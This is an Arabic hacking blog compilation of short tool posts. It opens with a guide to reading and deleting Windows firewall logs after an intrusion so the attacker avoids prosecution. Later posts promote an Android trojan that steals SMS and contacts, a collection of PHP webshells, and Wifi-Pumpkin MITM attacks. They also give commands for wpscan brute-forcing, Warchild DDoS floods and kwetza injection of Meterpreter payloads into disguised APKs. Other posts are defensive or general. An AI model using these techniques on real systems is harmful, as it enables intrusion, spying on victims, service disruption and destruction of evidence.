كيف يتم مسح سجل الجدار الناري لديك من قِبل الهاكر بعد الإختراق

0

جميعنا يعلم أن من أكبر الأخطاء التي يرتكبها المهاجم أو الهاكر هو الخروج من جهاز الضحية دون حذف السجلات .

وعدم حذف السجلات من الجهاز قد يذهبك الي السجن لأنها تعتبر الأدلة علي إرتكاب الجريمة (الإختراق) .

كيف يتم قراءة وحذف سجل جدار الحماية : 

بعد سيطرة الهاكر على الجهاز والدخول إلي ملفات النظام windows/system32 يمكنه كتابة أي أمر في CMD بصلاحية (Admin) المسؤول .


للذهاب لملف السجل نكتب الأمر cd logfiles/firewall سيتم عرض الملفات المُخزنة بواسطة dir الأن ظهر لدينا ملفان .





لقراءة ملفات سجل جدار الحماية نكتب الأمر type pfirewall.log نلاحظ بالصورة ظهور الـ(Mac address) الخاص بالهاكر .




وفي النهاية سيقوم بتعطيل جدار الحماية و حذف السجلات لحماية نفسه 







أداة Wifi-pumpkin لعمل نقطة إتصال وهمية والتجسس علي المتصل

0


Wifi-pumpkin هي بيئة متكاملة (Framework) مكتوبة بلغة البايثون لفحص أمان الواي فاي ومن أهم مميزات الأداة أنها
تقوم بعمل نقطة إتصال وهمية وعمل هجوم الرجل في المنتصف (Man In The Middle attack) ويمكن من خلالها تزوير تحديثات للويندوز .




أداة wpscan لاختبار إختراق مواقع ال WordPress

تنصيب الأداة : 

git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git 



cd WiFi-Pumpkin 

installer.sh --install/.


المميزات : 

  1. هجمات Karma .
  2. هجوم تحديثات الويندوز .
  3. مدير للتصيد .
  4. DNS Spoof .
  5. مميزات كثيرة تعرف عليها في المستودع .

تحميل الأداة من جيت هوب :   Wifi-pumpkin

أداة BlackWidow لإستخراج أرقام الهواتف والإيميل من المواقع

0



أداة BlackWidow 


مكتوبة بلغة البايثون تقوم بالبحث في عن الثغرات والروابط المتغيرة لغرض الأستغلال وتقوم بإستخراج أرقام
الجوال والإيميل والروابط الفرعية والكثير من المعلومات ايضا وتحتوي على حقن Inject-X

المميزات : 


  1. جمع جميع الروابط تلقائيا من موقع الويب المستهدف
  2. جمع جميع الروابط الديناميكية والمعلمات تلقائيا من موقع الويب المستهدف
  3. جمع جميع النطاقات الفرعية تلقائيا من موقع الويب المستهدف
  4. جمع جميع أرقام الهواتف تلقائيا
  5. جمع جميع عناوين البريد الإلكتروني تلقائيا
  6. جمع كل عنوان ورل النموذج تلقائيا
  7. مسح تلقائي عن نقاط الضعف (الثغرات)
  8. حفظ جميع البيانات تلقائيا إلى ملفات نصية Text

إقرأ أيضآ : 

أداة wpscan لاختبار إختراق مواقع ال WordPress


أداة krackattacks-test لاستغلال ثغرة krack الي موجوده في الواي فاي

مجموعة بها أكثر من 130 شيل WebShell مفتوحين المصدر

أداة kwetza لحقن تطبيقات الأندرويد بـ Meterpreter payload




تشغيل الأداة علي لينكس : 

cp blackwidow /usr/bin/blackwidow 


cp injectx.py /usr/bin/injectx.py
pip install -r requirements.txt



كيفية الأستخدام : 

blackwidow -u https://target.com - crawl target.com with 3 levels of depth

blackwidow -d target.com -l 5 - crawl the domain: target.com with 5 levels of depth

blackwidow -d target.com -l 5 -c 'test=test' - crawl the domain: target.com with 5 levels of depth using the cookie 'test=test'
blackwidow -d target.com -l 5 -s y - crawl the domain: target.com with 5 levels of depth and fuzz all unique parameters for OWASP vulnerabilities
injectx.py https://test.com/uers.php?user=1&admin=true - Fuzz all GET parameters for common OWASP vulnerabilities


تحميل الأداة :    BlackWidow

طريقة معرفة من عمل هجوم علي شبكة الواي فاي الخاصة بك

0


يتفاجئ العديد منا أحيانا عند إتصالهم بشبكات الواي فاي (Wifi) أن النت ينقطع لفترة ثم يعود وربما تستمر هذه العملية أكثر من مرة
وهذا طبعا أمر غير طبيعي أبدا لأن في هذه الحالة يقوم شخص ما بعمل هجوم على جهازك (الراوتر) .  ويمكن للشخص الذي قام بالهجوم أن يسرق بيانات المتصلين بنفس الشبكة مثل الباسوردات الخاصة بهم ومعرفة كل ما نقوم به عبر برامج مخصصة لذلك و لتفادي كل هذه المشاكل قم بتحميل برنامج  XARP.

يمكنك أيضآ التعرف علي :

4 تطبيقات لعمل هجوم على شبكات الواي فاي ومعرفة باسورداتها

أفضل 8 أفلام للقرصنة (الهاكر) التي يجب أن تشاهدها


شرح للبرنامج :

يقوم برنامج Xarp بحماية أجهزتنا من إنقطاع الأنترنت عنها أو تعرض بياناتنا للخطر وذلك عند إكتشاف البرنامج لهجوم من شخص ما يقوم بإصدار تنبيه لنا ومعلومات مفصلة عن هذا الشخص.
البرنامج يتوفر على نسختين المجانية تقوم فقط بتنبيهنا أن هناك خطر على معلوماتنا 
أما المدفوعة فهي تقوم بفصل عملية الهجوم .

تحميل البرنامج :

البرنامج يعمل علي أنظمة Linux و Windows حمله من الموقع الرسمي XARP 
مع إختيار النسخة المناسبة لنظامك

تشغيل البرنامج :

بعد تثبيت البرنامج قم بفتحه و قم بتعديل الإختيارات من قائمة : Security Level To إلى Beasic




إذا  تعرضت لهجوم فستضهر لك رسالة جانبية تحتوي عنوان IP الشخص المهاجم 
كالتالي :







حصان طروادة Trojan Horse مفتوح المصدر للأندرويد

0


قبل البدء في الشرح تعرفنا في الدروس السابقة علي ماهو الفايروس وما هي الديدان و التروجان وسبل الوقايه منهما لكن اليوم سوف نتحدث
عن فيروس تروجان للأندرويد ومفتوح المصدر وتقدر تحمله .

التروجان هو فيروس يصيب جهاز الضحية من دون علمه ويتيح للهاكر التحكم أو التجسس أو استغلال الجهاز لأغراض غير شرعية دون علم صاحب الجهاز مثل سرقة المعلومات الشخصية أو الصور أو الملفات السرية أو إفسادها أو تعطيل الجهاز أو جمع كلماته السرية التي يستخدمها على شبكة الانترنت (مواقع البريد الالكتروني أو المواقع التجارية الالكترونية) ومن تم تغييرها واستخدامها كوسيلة للابتزاز.

وجميعنا يعرف أنه يوجد 3 أنواع من الهاكر وهما Black Hat و White Hat و Grey Hat وتعرفنا علي الفرق بينهم في هذا الموضوع الفرق بين قراصنة القبعة سوداء و قبعة رمادية و قبعة بيضاء

نأتي الأن الي شرح الفيروس : 

الفيروس إسمه SocietyPoisonerTrojan

ودي الهام الي بيقوم الفيروس علي جهاز الضحية : 

1- سرقة رسائل sms من الضحية
2- سرقة جهات الاتصال الخاصة بالضحية
3- سرقة معلومات عن جهاز الاندرويد Android للضحية زي :

  • معلومات عن بطاقة sim

  • رقم الهاتف 

  • إصدار الهاتف


تحميل المشروع من جيت هوب : SocietyPoisonerTrojan

مجموعة بها أكثر من 130 شيل WebShell مفتوحين المصدر

0


ما هو الشيل Shell :

الشيل هو عباره عن أكواد مبرمجة بلغة البي إتش بي PHP ومن خلاله بامكانك التحكم بالموقع وممكن بالسيرفر كله
بس ده حسب صلاحياتك

ويمكن تحميله على الموقع للوصول إلى الملفات المخزنة على هذا الموقع. 
وبعد تحميله يمكن للقراصنة (الهاكر) إستخدامه لتعديل أو حذف أو تنزيل أي ملفات على الموقع أو تحميل ملفات خاصة به.

إزاي تحمي موقعك من الإختراق :

لمنع موقعك من تحميل الشيل عليه يجب على مشرف الموقع مواكبة أحدث تحديثات الأمان والتأكد من وجود لوحة تحكم آمنة. 


ويجب عليهم التأكد من أن لوحة التحكم تسمح فقط للمستخدم بتحميل .jpeg و .png وأنواع ملفات الصور الأخرى فقط.


الملفات :

هذه القائمة تحتوي علي أكثر من 130 WebShell مكتوبين بلغة ال PHP

ملحوظة : لا تقوم بتحميل الملفات علي السيرفر (الخادم) الخاص بك




و دي النهاية ^_^

أداة wpscan لاختبار إختراق مواقع ال WordPress

0

تعتبر اداة wpscan من اشهر الادوات لاختبار الاختراق لمنصة ووردبريس

تقوم الاداة بفحص نقاط الضعف في المواقع المنصب عليها ووردبريس


وهناك نقاط عديده تقوم بفحصها منها : اصدار السكربت ونقاط الضعف المشهوره في نسخه معينه فحص الاضافات واصداراتها واظهار نقاط الضعف فحص الثيمات المنصبه اذا كان هناك اصابه باحد الملفات يسمح لك بأستغلاله

سنقوم بشرح سريع لـ اهم الاوامر لاستخدام الاداة

لـ تشغيل الاداه وفحص موقع بشكل عام ومختصر نستخدم الامر التالي :

wpscan –url www.example.com

لـ فحص الاضافات المنصبة على الموقع نستخدم الامر التالي :

wpscan –url www.example.com –enumerate p

لـ فحص الثيمات المنصبة على الموقع نستخدم الامر التالي :

wpscan –url www.example.com –enumerate t

لـ اظهار اليوزرات بالموقع نسخدم الامر التالي ” تستخدم لعملية التخمين وجمع البيانات ” :

wpscan –url www.example.com –enumerate u

لـ التخمين على لوحة التحكم نستخدم الامر التالي ” مع تغيير ما يلزم مثل اليوزر + مسار قائمة كلمات المرور ” :

wpscan –url www.example.com –wordlist darkc0de.lst –username admin

لـ استخدام بروكسي في عملية الفحص نسخدم الامر التالي ( ملاحظه: يتم اضافته الى الاوامر السابقه ) :

–proxy 127.0.0.1:8118

لـ تحديث قاعدة بيانات السكربت لجلب اخر الثغرات بـ مواقع السكيورتي المشهوره نسخدم الامر التالي :

wpscan –update

لـتحميل الاداة من الموقع الرسمي https://wpscan.org

أداة krackattacks-test لاستغلال ثغرة krack الي موجوده في الواي فاي

0



اولا تم الكشف عن الثغرة من قبل الباحث الأمني ​​ماثي فانهوف، وذلك بالتعاون مع فريق الاستعداد لطوارئ الكمبيوتر الأمريكي التابع
للحكومة الأمريكية



وقال فانهوف يمكن إساءة استخدام هذا الأمر لسرقة معلومات حساسة مثل أرقام بطاقات الائتمان وكلمات المرور ورسائل الدردشة ورسائل البريد الإلكتروني والصور وما إلى ذلك وأضاف الهجوم يعمل ضد جميع شبكات الواي فاي المحمية الحديثة. 

وتابع فانهوف قائلًا "كل أجهزة الكمبيوتر الحديثة والهواتف وحتى الثلاجة الذكية يمكنها أن تتعرض للضرب، لاحظ أنه إذا كان جهازك يدعم الواي فاي، فمن المرجح أن يتأثر بالثغرة".

وتستطيع ثغرة "Krack" قراءة أي شيء تقريبًا يتم إرساله عبر الشبكة المصابة، كما يمكنها تجاوز تقنية HTTPS التي تشتهر بحماية أنشطة المستخدم من الاختراق على مواقع الإنترنت.

نأتي الان لطريقة استغلال الشبكة :

الاداه المستخدمة krackattacks-test

هنفتح الترمنال ونكتب الاوامر دي بالترتيب :

1) sudo apt update

2) sudo apt install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptodome

3) sudo rfkill unblock wifi

4) git clone https://github.com/vanhoefm/krackattacks-test-ap-ft.git


لتشغيل الاداة :


Python krack-ft-test.py –help

رابط الاداة : GitHub

10 خطوات بسيطة للمساعدة في أن تصبح هاكر أخلاقي

0

القرصنة أصبحت واحده من أهم الوظائف في وقتنا هذا ولكن ليست مهمة سهلة. يجب أن يكون لك معرفة عميقة مع أنظمة الكمبيوتر
(أنظمة التشغيل) وكذلك لغات البرمجة.
بعض الناس يعتقدون أن القراصنة او الهاكر دائما يكون مجرم ويقوم بأعمال غير قانونية وهذا الأمر خاطئ ففي الواقع معظم الشركات الكبري تستأجر قراصنة لحماية أنظمتها والمعلومات الحساسة وتقدم لهم مكافأت.

وفيما يلي قمنا بإعداد قائمة من 10 خطوه الأكثر أهمية لتصبح هاكر اخلاقي :

1- تعلم أنظمة لينكس / يونكس

لماذا قلنا تعلم لينكس وليس وينوز لأن لينكس توزيعة معده لأختبار الاختراق والتدقيق الامني وهو نظام مفتوح المصدر يسمح بالتعديل عليه ويجب عليك أن تعلم أن بدون تعلم لينكس لن تصبح هاكر أخلاقي أو غير أخلاقي.

2- تعلم لغة سي

لغة البرمجة سي هي قاعده تعلم اللينكس حيث تم برمجه النظام بها مما يجعلها اللغة الأقوي بالمقارنة مع لغات البرمجة الأخري تم تطوير لغة سي من قبل دينيس ريتشي في أواخر 1970 لتصبح هاكر يجب أن تتقن اللغة.

3- تعلم التعليمات البرمجية في اكثر من لغة برمجة

من المهم لشخص في مجال القرصنة معرفة أكثر من برمجة واحدة. هناك العديد من لغات البرمجة لتعلم مثل بايثون وجافا وسي++ من الكتب المجانية والدروس متاحة بسهولة علي الأنترنت.

4- تعلم مفاهيم الشبكات

خطوة هامة أخرى ضرورية لتصبح هاكر هي أن تكون على دراية بمفاهيم الشبكات و كيفية إنشاء الشبكات. تحتاج إلى معرفة الاختلافات بين أنواع مختلفة من الشبكات ويجب أن يكون لديك فهم واضح من tcp / ip و udp لاستغلال الثغرات في النظام.

5- تعلم أكثر من نظام تشغيل

من الضروري للهاكر أن يتعلم أكثر من نظام تشغيل واحد. هناك العديد من أنظمة التشغيل الأخرى بخلاف ويندوز، يونيكس / لينكس الخ كل نظام لديه ثغرات، الهاكر يحتاج إلى استغلالها.

6- تعلم التشفير

لتصبح هاكر ناجح تحتاج لإتقان فن التشفير. التشفير وفك التشفير مهارات مهمة في القرصنة. ويتم التشفير على نطاق واسع في عدة جوانب من أمن المعلومات في التوثيق والسرية وسلامة البيانات. المعلومات على الشبكة في شكل مشفر مثل كلمات السر. هذه الرموز المشفرة تحتاج إلى كسر، وهو ما يسمى فك التشفير.

7- معرفة المزيد عن القراصنة (الهاكر)

تذهب من خلال دروس مختلفة، والكتب التي كتبها خبراء في مجال القرصنة. والتعلم لا ينتهي أبدا لأن الأمن يتغير كل يوم مع التحديثات الجديدة في النظم.

8- التجربة

بعد تعلم بعض المفاهيم، والجلوس وممارستها وإعداد المختبر الخاص بك لغرض تجريبي. تحتاج إلى نظام كمبيوتر جيد للبدء مع بعض الأدوات قد تتطلب معالج قوي و ذاكرة الوصول العشوائي (الرام) الخ.

9- المساهمة في المشاريع الأمن مفتوحة المصدر

مشروع أمن الكمبيوتر مفتوح المصدر يساعدك كثيرا في تلميع واختبار المهارات الخاصة بك أنت كهاكر. بعض المنظمات مثل موزيلا، أباتشي تقدم مشاريع مفتوحة المصدر. وتكون جزءا منها حتى لو كانت مساهمتك صغيرة، وسوف تضيف قيمة كبيرة إلى مجال عملك.

10- الأنضمام لمجموعات تواصل الهاكر

الأكثر أهمية بالنسبة للقراصنة هو الاتحاد أو الانضمام للمنتديات والمناقشات مع المتسللين الآخرين في جميع أنحاء العالم، بحيث يتمكنوا من تبادل المعلومات والعمل كفريق واحد. الانضمام إلى مجموعات الفيسبوك المتعلقة بالقرصنة حيث يمكنك الحصول على المزيد من الخبراء في هذا المجال..

إختبار الاختراق تطبيقات الويب مع BurpSuite - الجزء 1

0

BurpSuite هو أداة الكل في واحد لاختبار اختراق تطبيقات الويب تم إنشاؤها من قبل دافيد ستوتارد تحت اسم مستعار Portswigger. دافيد 

شارك في تأليف كتابه الشهير كتاب هاكر تطبيق ويب

بوربسويت يحتوي على الأدوات التالية:

1. Proxy Server for request/response analysis
2. Password cracker and username enumerator
3. Input Field Brute Forcer
4. Web Spider
5. Decoder for common encodings(URL, BASE64 etc)
and much more.


إقرأ ايضا :
أداة War Child لإختبار قدرة المواقع والسيرفرات على تحمل هجمات حجب الخدمة DDOS


كيفية البدء:
الخطوات بسيطة هي:

1. اختيار متصفح (أنا أفضل موزيلا فايرفوكس)
2. اختيار 
(127.0.0.1)(localhost) في 8080 كبروكسي في المتصفح الذي اخترته.
3. شغل بورسويت وتكوين البروكسي من نافذة خيارات.
4. أنت الان
 جاهز!

أشياء لمعرفة المزيد عن HTTP:
HTTP هو بروتوكول التطبيق الذي يتم تشغيله عبر TCP. وهو يعمل على بنية الطلب والاستجابة أي العميل يقوم
 بإرسال طلب ويستجيب الخادم مع استجابتة.

طلب / استجابة نموذجية له قسمان 


1. 
جزء الرأس Header Part
2. جزء المحتوى
 Content Part

يحتوي 
جزء الرأس على أزواج اسم قيمة مختلفة وبعض الرؤوس التي تحدد العديد من معلمات الاتصال.
عمل HTML وأنواع الرؤوس في عمل استجابة هو موضوع واسع الذي سوف يغطي مقال آخر قبل الدخول في مراحل متقدمة من إختبار الاختراق تطبيقات الويب. في الوقت الحالي، هذه المعلومات كافية.


أفضل 8 أفلام للقرصنة (الهاكر) التي يجب أن تشاهدها

0

أفضل أفلام القرصنة التي يجب أن تشاهدها

إذا كنت مهوس، مبرمج، أو هاكر
 يجب أن يكون الشخص الذي يحب الأفلام على مهوس
بالقرصنة والترميز.
هذه الأفلام هي كبيرة بالنسبة للقراصنة للحصول على مصدر إلهام وسعادة غامرة. هذه الأفلام قد لا يعلمك كيفية الإختراق، ولكن زيادة الفضول وشرح الاشياء الجديدة المثيرة للاهتمام.

وهنا لائحة من أعلى 8 القرصنة الأفلام جنبا إلى جنب مع المقطورات.

1. Blackhat(2015)

من خلال النظر إلى اسم الفيلم، قد تكون قد فهمت ما هو هذا الفيلم. في هذا الفيلم، قراصنة الإختراق محطة للطاقة النووية الصينية لبدء تفاعل نووي. في الوقت نفسه، و أيضا الإختراق البورصة وسرقة مليون دولار من البنك. شاهد الفيلم


2. Algorithm: The Hacker Movie (2014)


في هذا الفيلم، قراصنة الكمبيوتر المستقل يقتحم المقاول الحكومي السري وينزل البرنامج. يجب أن يختار بين فضوله وحياة أصدقائه


3. Snowden (2016)

ويستند الفيلم إلى قصة الحياة الحقيقية إدوارد سنودن، وهو متخصص في الكمبيوتر الأمريكي الذي تسربت معلومات سرية من وكالة الأمن القومي إلى الغارديان في يونيو 2013.


4. Live Free or Die Hard (2007)


والرابع في سلسلة داي هارد، ليف فري أو داي هارد، يصور سيناريو يقوم فيه القراصنة الذي يلعبه تيموثي أوليفانت (الشهرة المجيدة) بإنزال البنية التحتية الأمريكية بأكملها تقريبا في محاولة لنقل تريليونات الدولارات من مجلس الاحتياطي الاتحادي إلى الحساب.
5. The Fifth Estate (2013)

تستلهم المنطقة الخامسة من قصة جوليان أسانج و ويكيليكس. كومبرباتش يلعب أسانج تصديق كما إغوستيستيك، المثالي الذي هو خارج لتغيير العالم. عدد قليل من الأميركيين يعرفون أن أسانج هو القراصنة الشهير (أو سيئة السمعة) في بلده الأصلي من أستراليا. اقتحم البنتاغون وسيتي بنك وناسا وجامعة ستانفورد، من بين مرافق أخرى، قبل أن يتم القبض عليه.

6. Eagle Eye (2008)

في هذا الفيلم، شخصين الحصول على مكالمة من عدد غير معروف من قبل امرأة. أنها تحصل على مهمة على الهاتف أنه إذا لم تتبع مكالمة هاتفية أنه سوف يموت. هذا الفيلم يعرض العملاق الإختراق على جميع الشبكات والشبكات العسكرية.


7. I.T. (2016)

مايك ريغان لديه كل ما يمكن أن تريد من أي وقت مضى، عائلة جميلة وأعلى من المنزل الذكي. الشركة التي يملكها على وشك تغيير رحلة المغادرة إلى الأبد. وهذا هو، حتى العلاقة مع أقرب مستشار له يتحول للاسوء، لدرجة أن ابنته في سن المراهقة يتم مطاردة وعائلته تتعرض للهجوم من خلال كل جوانب التكنولوجية من حياتهم


8. Reboot (2012)

يستيقظ أحد القراصنة الشابات من حدث صادم لا تذكره إلا بالكاد، وجهاز
 ايفون ملتصق بيدها. على الهاتف، العد التنازلي تدق بعيدا إلى الصفر. ماذا يحدث عند الصفر؟


الفرق بين قراصنة القبعة سوداء و قبعة رمادية و قبعة بيضاء

0

كلمة هاكر لها العديد من المعاني وفي عالم الكمبيوتر أنها تشير إلى شخص يجعل الجهاز يعمل بطريقة لا يتوقعها
 المستخدم العادي. بشكل عام، كلمة القراصنة هي واحدة من أكثر الكلمات سوء الفهم في اللغة الإنجليزية. الناس عموما عندما يسمعون كلمة القراصنة يفترضون انه المجرم الإلكتروني . ولكن في الواقع، كلمة القراصنة لديها الكثير من المعاني.

يتم تصنيف القراصنة عموما إلى ثلاثة أنواع. هم قبعة سوداء، قبعة رمادي و قبعة بيضاء.

قبعة سوداء
هؤلاء الناس الناس يعتقدون عندما يسمعون كلمة القراصنة. هؤلاء هم الأشرار، ويستخدمون قوتهم وذكائهم لكسب المال بطرق غير مشروعة. كلما وجدوا ضعف، يسيئون استخدامها لمصلحتهم الخاصة ولا تدع أصحابها يعرفون عن التهديد والضعف. أنها محاولة لسرقة كلمات السر المستخدمين ورسائل البريد الإلكتروني وغيرها من التفاصيل الشخصية وبيعها على الانترنت
 المظلم.

القبعات الرمادية
القبعات الرمادية
 هي ما بين الاسود و الابيض. هؤلاء هم الذين يجدون نقاط الضعف ويكشفون عنها للحكومة أو وكالات الاستخبارات العسكرية في بعض الأحيان. ثم تستخدم الحكومة هذه المعلومات لاختراق وكالة أو جماعة إجرامية. ويمكن أن يكونوا أفراد أو باحثين سعيا وراء الخلل والعيوب التي قد تكون مفيدة للحكومة.

القبعات البيضاء
قراصنة القبعة البيضاء هم
 جماعه الخير، أنها الإختراق في شبكة أو الإختراق البرمجيات وثم يخبر مالكها عن الأخطاء التي تحتاج إلى إصلاح. فهي تساعد على بناء برنامج أفضل وأكثر أمانا. أنهم يجمعون المال التي يحصلون عليها عندما يخطرون شركة عن ضعف معين. يختلف الأجر تبعا لشدة الخلل وكثره الثغرات، ومع ذلك، فإنها يمكن أن تكون في أي مكان بين 500 $ إلى أكثر من 100،000 $.

أداة War Child لإختبار قدرة المواقع والسيرفرات على تحمل هجمات حجب الخدمة DDOS

0

من أحد نقاط القوة في المواقع، هو قدرة تحملها لهجمات حجب الخدمة DDoS، وقدرتها على صد أنواع مختلفة من هجمات حرمان الخدمة،

وذلك لأنها تسبب أضرار كبيرة لمواقع الويب.

ويمكن لمختبري الإختراق الإستعانة بأداه Warchild والتي يمكن من خلالها تحليل مدى قوة الموقع في التعامل مع هذه الهجما.
تتكون أداه Warchild من المميزات التالية:-

1- CloudBust :- يتم إستخدام هذا الخيار للمواقع التي تستخدم خدمة كلاود فلير، والتي تم إعداد DNS لها بشكل خاطئ، حيث تعتمد الأداه على موقع dnsdumpster.com للحصول على العنوان الحقيقي للموقع.

2- HTTP Flood :- هو نوع من أنواع هجوم حرمان الخدمة ، حيث يتم إرسال طلبات بشكل كبير للموقع، حيث يتم إستهلاك موارد النظام وعدم إتاحته للزوار الحقيقيين للموقع.

3- TCP SYN Flood:- شكل من أشكال هجمات حجب الخدمة ، ويتم من خلالها أيضا إستهلاك موارد النظام، حتى يصبح لا يستجيب لطلبات الزيارة الحقيقية، هنا يجب تحديد Hostname و الـ port.

4- UDP Flood:- هو نوع من الهجوم يتم من خلال إستخدام بروتوكول UDP (User Diagram Protocol)


طريقة تثبيت الأداة؟
بعد تثبيت الأداة من موقع 
GitHub وفك الضغط والدخول للمجلد
#cd Warchild #pip install -r requirement.txt

حيث هنا يتم تثبيت جميع متطلبات الأداة.
طريقة تشغيل الأداة؟
#python warchild.py

تظهر مجموعة من الخيارات، حيث يجب إختيار الخيار المناسب لنوع الهجوم الذي يود مختبر الإختراق القيام به، وبعد وضع الخيار يتم وضع الهدف.

تحميل الأداة من : GitHub

CLOUD HAT أداه مجانية لتحديد IP الحقيقي للمواقع التي تستخدم خدمة كلاود فلير.

0

من أحد أهم الأدوات المنتشرة على الإنترنت لحماية المواقع من هجمات حجب الخدمة DDOS ، خدمة كلاود فلير.

خدمة كلاود فلير، هي خدمة

تساعد على توفير حماية للمواقع من الهجمات وأشهرها هجمات حجب الخدمة، حيث تقوم بفلتره الترافيك على الموقع.

كما إنها تساعد على تصفح المواقع بكل سرعة من خلال التخفيق من الطلبات الموجهه للمواقع، وذلك يعود لشبكتها الموزعة حول العالم، حيث يتم توزيع الموقع على سيرفرات حول العالم، وعند طلب الموقع فإن الزائر سيتصل بأقرب سيرفر إلية.

كما تقوم الخدمة بإخفاء العنوان الحقيقي IP للسيرفر المستضيف للموقع، حيث يظهر للمستخدمين أو من يرغبون بمعرفة الـ IP سيظهر لهم عناوين سيرفرات كلاود فلير.

مؤخرا ظهرت أداه تدعى CLOUD HAT، حيث تتيح الأداه معرفة العنوان الحقيقي للسيرفرات المستضيفة للمواقع والتي تستخدمة خدمة كلاود فلير.

إستخدم الأداه بسيط، حيث بعد تحميلها من موقع جيت هب، يجب التوجه لموده الأوامر، وكتابة الأمر التالي

ruby hatcloud.rb -h or --help ruby hatcloud.rb -b your site
او
ruby hatcloud.rb --byp your site

تبرز أهمية الأداه لمختبري إختراق المواقع والسيرفرات، حيث يساعدهم ذلك في إكتشاف العنوان الحقيقي للمواقع، والقيام بأعمالهم على أكمل وجة.

تحميل الأداة من : GitHub

أداة kwetza لحقن تطبيقات الأندرويد بـ Meterpreter payload

0

من أهم
 الطرق المستخدمة في إختراق هواتف أندرويد، أن يتم تثبيت ملف apk ( تطبيق ) على جهاز الضحية، ويلجئ الهاكرز
لإخفاء هذه التطبيقات ضمن تطبيقات أخرى (الهندسة الإجتماعية)، مثلا تطبيقات ألعاب أو دردشه أو ربح المال وغيرها ..

ومن الأدوات التي تساعدهم في القيام بدمج التطبيقات وإخفائها (الهندسة الإجتماعية) أدة kwetza.



تثبيت أداة kwetza

git clone https://github.com/sensepost/kwetza.git

طريقة إستخدام kwetza


python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no


nameOfTheApkToInfect.apk:
 الملف أو اسم التطبيق الذي تريد عمل حقن له (تطبيق ألعاب...).


root@kali:~/Desktop/kwetza# python kwetza.py testhack.apk 192.168.1.1 444 yes

يتم حفظ الملف الجديد في المسار التالي، وهو بنفس إسم الملف الأصلي قبل الحقن.
/root/Desktop/kwetza/testhack/dist/testhack.apk

هل أنت هكر هذا الموقع مستحيل تستغني عنه

0


Malware Analysis Tools

موقع يحتوي علي كثير من أدوات تحليل البرامج الضارة التي تساعد الاشخاص الذين يعملون على تحليل الفيروسات
والبرامج الضارة وهو سيفيدك مثل أدوات الهندسة العكسية

الأدوات الموجودة بالموقع :

  1. الترميز - فك الترميز
  2. تحليل الملفات الخبيثة
  3. ادوات android
  4. ملفات كارفين
  5. الطب الشرعي
  6. الماسحات الضوئية على شبكة الانترنت
  7. ادوات sential لتحليل البرامج الضارة الثابتة
  8. اماكن للحصول على عينات برامج ضارة
  9. لغة البرمجة الخاصة بكل منها
  10. debuggers-decompilers

الموقع : Malware Analysis Tools

أداة ASTo لتحليل أمان شبكة إنترنت

0




أستو هي أداة تحليل الأمان لشبكات الانترنت. تم تطويره لدعم الإطار الأمني ​​للجهاز. ويستند أستو على electron و cytoscape.js.
يتم توفير الرموز بواسطة  Material Design من جوجل .

التطبيق لا يزال في مرحلة النماذج الأولية مما يعني أن الكثير من الوظائف يتم إضافة مع كل ارتكاب جنبا إلى جنب مع تغييرات هائلة في كل شيء تقريبا

لقطات :



طريقة الاستخدام :

لاستنساخ وتشغيل هذا المستودع ستحتاج جيت و Node.js مثبتا على جهاز الكمبيوتر الخاص بك. لتنزيل التطبيق وتثبيته، اكتب ما يلي في الجهاز الطرفي:

# Clone this repository 

git clone https://github.com/Or3stis/apparatus.git 

# Go into the repository 

cd apparatus 

# Install dependencies 

npm install 

# to run the app 

npm start

لأن التطبيق لا يزال في مرحلة النموذج الأولي فمن الأفضل للحفاظ على ما يصل إلى موعد مع أخر التحديثات للقيام بذلك 
قبل بدء التطبيق اكتب :

# inside the apparatus directory 

# update to latest 

git pull

للتحميل  من : GitHub